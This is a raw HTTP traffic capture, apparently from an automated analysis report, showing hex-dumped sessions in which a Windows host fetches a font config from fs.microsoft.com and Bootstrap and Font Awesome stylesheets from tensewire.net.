                              2024-04-25 18:22:12 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 d4 00 06 00 bf 00 38 00 bd 00 a3 00 be 00 ef 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 bf 00 af 00 bb 00 40 00 b9 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 00 07 00 bf 00 3c 00 bf 00 a3 00 be 00 ec 00 be 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 f3 00 be 00
                              Data Ascii: 8@<
                              2024-04-25 18:22:12 UTC1369INData Raw: be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f1 00 be 00 b0 00 bc 00 45 00 b3 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 00 06 00 be 00 3b 00 be 00 a9 00 bf 00 ef 00 be 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2
                              Data Ascii: E;
                              2024-04-25 18:22:12 UTC1369INData Raw: 00 4c 00 be 00 bc 00 bf 00 f6 00 be 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 be 00 b0 00 bb 00 40 00 db 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 00 0e 00 bf 00 6b 00 be 00 de 00 bd 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 f6 00 be 00 c4 00 bd 00 55 00 c4 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 bf 00 0c 00 be 00 4f 00 be 00 c1 00 bf 00 f6 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 fe 00
                              Data Ascii: L@kUO
                              2024-04-25 18:22:12 UTC1369INData Raw: 0c 00 bb 00 53 00 be 00 c1 00 be 00 f7 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f3 00 be 00 b0 00 be 00 3f 00 b3 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 b4 00 11 00 c0 00 51 00 be 00 bc 00 be 00 f4 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be
                              Data Ascii: S?Q


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.449745184.24.36.112443
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:12 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                              Range: bytes=0-2147483646
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-04-25 18:22:12 UTC531INHTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              ApiVersion: Distribute 1.1
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                              Cache-Control: public, max-age=132119
                              Date: Thu, 25 Apr 2024 18:22:12 GMT
                              Content-Length: 55
                              Connection: close
                              X-CID: 2
                              2024-04-25 18:22:12 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.449748104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:12 UTC661OUTGET /assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC826INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: text/css
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:24 GMT
                              last-modified: Fri, 20 Aug 2021 13:04:53 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201469
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WD%2BKQa8W23%2FAO3YKIrsfK6TKteZr558tw5LV2TitTzYKN8l5kAJSfOOMVgocbzxmYsOeHkzU9oLP4lSHCGC7E7slGLJRRX91Y2cJ07%2BoVwLmfXJE5AUaXwhBYDGeGJqr"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b73ce22adcf-ATL
                              2024-04-25 18:22:13 UTC543INData Raw: 37 62 63 33 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66
                              Data Ascii: 7bc3/*! * Bootstrap v4.5.3 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors * Copyright 2011-2020 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--blue:#007bff;--indigo:#6610f
                              2024-04-25 18:22:13 UTC1369INData Raw: 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78 3b 2d 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 2d 73 61 6e 73 2d 73 65 72 69 66 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 22 53 65 67 6f 65 20 55 49 22 2c 52 6f 62 6f 74 6f 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 41 72 69 61 6c 2c 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 73 61 6e 73 2d 73 65 72 69 66 2c 22
                              Data Ascii: t:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"
                              2024-04-25 18:22:13 UTC1369INData Raw: 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 64 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20
                              Data Ascii: ;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0
                              2024-04-25 18:22:13 UTC1369INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 72 6f 6c 65 3d 62 75 74 74 6f 6e 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64
                              Data Ascii: ont-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]:not(:disabled
                              2024-04-25 18:22:13 UTC1369INData Raw: 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 64 69 73 70 6c 61 79 2d 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b
                              Data Ascii: 2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:6rem;font-weight:300;line-height:1.2}.display-2{font-size:5.5rem;font-weight:300;
                              2024-04-25 18:22:13 UTC1369INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 6b 62 64 20 6b 62 64 7b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 7d 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 70 72 65 2d 73 63 72 6f 6c 6c 61 62 6c 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 34 30 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 7d 2e 63 6f 6e
                              Data Ascii: ackground-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:100%;font-weight:700}pre{display:block;font-size:87.5%;color:#212529}pre code{font-size:inherit;color:inherit;word-break:normal}.pre-scrollable{max-height:340px;overflow-y:scroll}.con
                              2024-04-25 18:22:13 UTC1369INData Raw: 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63 6f 6c 2d 73 6d 2d 37 2c 2e 63 6f 6c 2d 73 6d 2d 38 2c 2e 63 6f 6c 2d 73 6d 2d 39 2c 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 78 6c 2c 2e 63 6f 6c 2d 78 6c 2d 31 2c 2e 63 6f 6c 2d 78 6c 2d 31 30 2c 2e 63 6f 6c 2d 78 6c 2d 31 31 2c 2e 63 6f 6c 2d 78 6c 2d 31 32 2c 2e 63 6f 6c 2d 78 6c 2d 32 2c 2e 63 6f 6c 2d 78 6c 2d 33 2c 2e 63 6f 6c 2d 78 6c 2d 34 2c 2e 63 6f 6c 2d 78 6c 2d 35 2c 2e 63 6f
                              Data Ascii: d-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-auto,.col-xl,.col-xl-1,.col-xl-10,.col-xl-11,.col-xl-12,.col-xl-2,.col-xl-3,.col-xl-4,.col-xl-5,.co
                              2024-04-25 18:22:13 UTC1369INData Raw: 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 31 31 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36
                              Data Ascii: h:58.333333%}.col-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-11{-ms-flex:0 0 91.666667%;flex:0 0 91.66
                              2024-04-25 18:22:13 UTC1369INData Raw: 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 32 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 34 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 32 35 25 3b 66 6c 65 78 3a 30 20 30 20 32 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 35 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30
                              Data Ascii: 0 0 100%;max-width:100%}.row-cols-sm-2>*{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.row-cols-sm-3>*{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.333333%}.row-cols-sm-4>*{-ms-flex:0 0 25%;flex:0 0 25%;max-width:25%}.row-cols-sm-5>*{-ms-flex:0
                              2024-04-25 18:22:13 UTC1369INData Raw: 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 73 6d 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 33 3b 6f 72 64 65 72 3a 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 34 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 34 3b 6f 72 64 65 72 3a 34 7d 2e 6f 72 64 65 72 2d 73 6d 2d 35 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 35 3b 6f 72 64 65 72 3a 35 7d 2e 6f 72 64 65 72 2d 73 6d 2d 36 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 36 3b 6f 72 64 65 72 3a 36 7d 2e 6f 72 64 65 72 2d 73 6d 2d 37 7b 2d 6d 73 2d 66 6c 65
                              Data Ascii: der:0;order:0}.order-sm-1{-ms-flex-order:1;order:1}.order-sm-2{-ms-flex-order:2;order:2}.order-sm-3{-ms-flex-order:3;order:3}.order-sm-4{-ms-flex-order:4;order:4}.order-sm-5{-ms-flex-order:5;order:5}.order-sm-6{-ms-flex-order:6;order:6}.order-sm-7{-ms-fle


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.449749104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:12 UTC655OUTGET /assets/vendors/fontawesome_pro/css/all.min.css HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC824INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: text/css
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:24 GMT
                              last-modified: Thu, 09 Nov 2023 20:05:24 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201469
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3C9%2F7oYJRfaIgbaL9IT1H%2FPwgyVvMW43dOntT3k9tKImO7m3Hdo2amb8dvExy3fnupRyJlP1l6IMV3N5Ar2VImvUKpqWaHVKkh9XhPZw6ApD8FWax6nk9QuptoQ2IE8N"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b73cf04b0bb-ATL
                              2024-04-25 18:22:13 UTC545INData Raw: 37 62 63 35 0d 0a 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65 2d 66 61 6d 69 6c 79 2c 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 50 72 6f 22 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65 2c 39 30 30 29 7d 2e 66 61 2c 2e 66 61 2d 63 6c 61 73 73 69 63 2c 2e 66 61 2d 73 68 61 72 70 2c 2e 66 61 73 2c 2e 66 61 2d 73 6f 6c 69 64 2c 2e 66 61 72 2c 2e 66 61 2d 72 65 67 75 6c 61 72 2c 2e 66 61 73 72 2c 2e 66 61 6c 2c 2e 66 61 2d 6c 69 67 68 74 2c 2e 66 61 73 6c 2c 2e 66 61 74 2c 2e 66 61 2d 74 68 69 6e 2c 2e 66 61 64 2c 2e 66 61 2d 64 75 6f 74 6f 6e 65 2c 2e 66 61 73 73 2c 2e 66 61 2d 73 68 61 72 70 2d 73 6f 6c 69 64 2c 2e 66
                              Data Ascii: 7bc5@charset "utf-8";.fa{font-family:var(--fa-style-family,"Font Awesome 6 Pro");font-weight:var(--fa-style,900)}.fa,.fa-classic,.fa-sharp,.fas,.fa-solid,.far,.fa-regular,.fasr,.fal,.fa-light,.fasl,.fat,.fa-thin,.fad,.fa-duotone,.fass,.fa-sharp-solid,.f
                              2024-04-25 18:22:13 UTC1369INData Raw: 6d 65 20 36 20 50 72 6f 22 7d 2e 66 61 62 2c 2e 66 61 2d 62 72 61 6e 64 73 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 42 72 61 6e 64 73 22 7d 2e 66 61 64 2c 2e 66 61 2d 63 6c 61 73 73 69 63 2e 66 61 2d 64 75 6f 74 6f 6e 65 2c 2e 66 61 2d 64 75 6f 74 6f 6e 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 44 75 6f 74 6f 6e 65 22 7d 2e 66 61 73 73 2c 2e 66 61 73 72 2c 2e 66 61 73 6c 2c 2e 66 61 2d 73 68 61 72 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 36 20 53 68 61 72 70 22 7d 2e 66 61 73 73 2c 2e 66 61 2d 73 68 61 72 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d
